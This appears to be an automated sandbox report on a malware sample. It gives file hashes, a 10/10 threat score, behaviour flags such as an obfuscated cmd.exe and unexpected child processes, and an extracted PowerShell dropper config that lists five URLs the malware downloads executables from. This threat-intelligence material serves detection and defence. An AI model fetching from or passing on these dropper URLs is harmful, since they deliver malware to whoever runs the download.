General

  • Target

    649a322463ae3003e2b0c8f02ade3262_JaffaCakes118

  • Size

    78KB

  • Sample

    240521-yxbzdsgh88

  • MD5

    649a322463ae3003e2b0c8f02ade3262

  • SHA1

    9139602374f2500f3156b8b76be211c414d29c77

  • SHA256

    4d9a774a08bfe1c47c9075cc3bb351ec9dfeaa453118d4ae6d928812ccc91f76

  • SHA512

    8376e2f12e40550bb10a789c10682566c7a30bf7e9d1adf178afaf8832d8bf89be6565a15be009408206fed8ff53321d20a092d9c15b46dcb510e8990fd14bde

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aAIIrlnKchqXN076KC0It4oC:3te2dw99fK2vR1It4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aliu-rdc.org/QwWKYJxM

exe.dropper

http://2idiotsandnobusinessplan.com/wC7

exe.dropper

http://7naturalessences.com/DFaSvtrS

exe.dropper

http://benimdunyamkres.com/v0vig1G1

exe.dropper

http://hostmktar.com/mP

Targets

    • Target

      649a322463ae3003e2b0c8f02ade3262_JaffaCakes118

    • Size

      78KB

    • MD5

      649a322463ae3003e2b0c8f02ade3262

    • SHA1

      9139602374f2500f3156b8b76be211c414d29c77

    • SHA256

      4d9a774a08bfe1c47c9075cc3bb351ec9dfeaa453118d4ae6d928812ccc91f76

    • SHA512

      8376e2f12e40550bb10a789c10682566c7a30bf7e9d1adf178afaf8832d8bf89be6565a15be009408206fed8ff53321d20a092d9c15b46dcb510e8990fd14bde

    • SSDEEP

      1536:JptJlmrJpmxlRw99NBO+aAIIrlnKchqXN076KC0It4oC:3te2dw99fK2vR1It4

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks